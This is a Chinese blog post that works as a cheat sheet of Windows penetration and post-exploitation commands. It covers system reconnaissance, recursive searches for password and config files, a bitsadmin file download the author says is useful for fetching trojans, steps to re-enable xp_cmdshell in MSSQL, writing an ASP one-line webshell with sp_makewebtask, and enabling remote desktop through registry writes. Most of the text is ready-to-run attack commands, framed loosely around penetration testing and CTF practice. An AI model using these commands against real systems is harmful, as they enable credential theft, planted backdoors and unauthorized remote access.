windows渗透命令

1. 获取操作系统信息

systeminfo

2.获取ARP缓存信息:

arp -a

结果:
接口: 169.254.249.47 --- 0xc
  Internet 地址         物理地址              类型
  169.254.255.255       ff-ff-ff-ff-ff-ff     静态
  224.0.0.22            01-00-5e-00-00-16     静态
  224.0.0.251           01-00-5e-00-00-fb     静态
  224.0.0.252           01-00-5e-00-00-fc     静态
  239.255.255.250       01-00-5e-7f-ff-fa     静态
  255.255.255.255       ff-ff-ff-ff-ff-ff     静态

3. 查看服务进程id

tasklist /SVC

cmd.exe                       9508 暂缺
conhost.exe                   2216 暂缺
chrome.exe                   11616 暂缺
navicat.exe                  11520 暂缺
chrome.exe                   11336 暂缺
chrome.exe                   11408 暂缺
WeChat.exe                    1672 暂缺
WeChatWeb.exe                11744 暂缺
chrome.exe                   11936 暂缺
notepad++.exe                12716 暂缺
HipsDaemon.exe               13504 HipsDaemon
usysdiag.exe                 11376 暂缺
chrome.exe                    5440 暂缺
chrome.exe                    6136 暂缺
YNoteCefRender.exe           13756 暂缺
chrome.exe                   11276 暂缺
chrome.exe                    1324 暂缺
chrome.exe                    4560 暂缺
taskeng.exe                   5552 暂缺
tasklist.exe                 13384 暂缺
WmiPrvSE.exe                 13928 暂缺

4.查看服务、进程和启动程序信息:

 wmic service list brief 
 wmic process list brief
 wmic startup list brief

这三个命令十分强大。
不过在win8下面好像被禁了。

5.敏感数据和目录

 dir /b/s password.txt
 dir /b/s config.* 
 findstr /si password *.xml *.ini *.txt
 findstr /si login *.xml *.ini *.txt

前两个命令是查文件的,比如在ctf比赛中,可以查flag.txt或者flag.*
后两个是是查找文件中的字符串。

6. 文件下载

bitsadmin /transfer n http://download.fb.com/file/xx.zip c:\pentest\xx.zip

可以用来下载木马什么的。不过速度确实不怎么快,用于下个小文件。

7.mssql相关
说到这个,就必须要介绍xp_cmdshell了,通过该存储过程可以在数据库服务器中执行任意系统命令。MSSQL2005,2008等之后版本的MSSQL都分别对系统存储过程做了权限控制以防止被滥用。

xp_cmdshell默认在mssql2000中是开启的,在mssql2005之后的版本中则默认禁止。如果用户拥有管理员sa权限则可以用sp_configure重修开启它。


EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
exec sp_configure

开启后可以执行语句:


sp_makewebtask写入一句话

如果未启用Web Assistant Procedures
SQLServer 阻止了对组件 'WebAssistant Procedures' 的 过程'sys.xp_makewebtask' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。

开启:

exec sp_configure 'Web AssistantProcedures', 1; RECONFIGURE

写入木马:

exec sp_makewebtask 'c:\1.asp','select''<%execute(request("ruo"))%>'''

注册表操作
启用存储过程:

exec sp_addextendedprocxp_regread,'xpstar.dll'

查看远程桌面开启

exec xp_regread
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections'

开启远程桌面

exec xp_regwrite
'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\TerminalServer',
'fDenyTSConnections',
'REG_DWord',0

参考http://www.freebuf.com/articles/system/114731.html
http://www.freebuf.com/articles/web/55577.html

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,895评论 0 9
  • 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3....
    钦玄阅读 1,244评论 0 5
  • 好多人会觉得 眼下的生活,手边的工作 貌似都是苟且 唯有远方,才有诗歌与田野 然而 当亲征远方 才发现 那并不都是...
    晴晴晴阅读 749评论 0 1
  • 风花雪月与来观,日惜光景似绵长。
    她说不出的话阅读 255评论 0 0
  • 假如有人对你说,我会想你的。你什么心情? 好吧,反正我会窃喜的。 对你而言重要的人只当你是“某人”,你什么心情?我...
    铭93阅读 321评论 0 1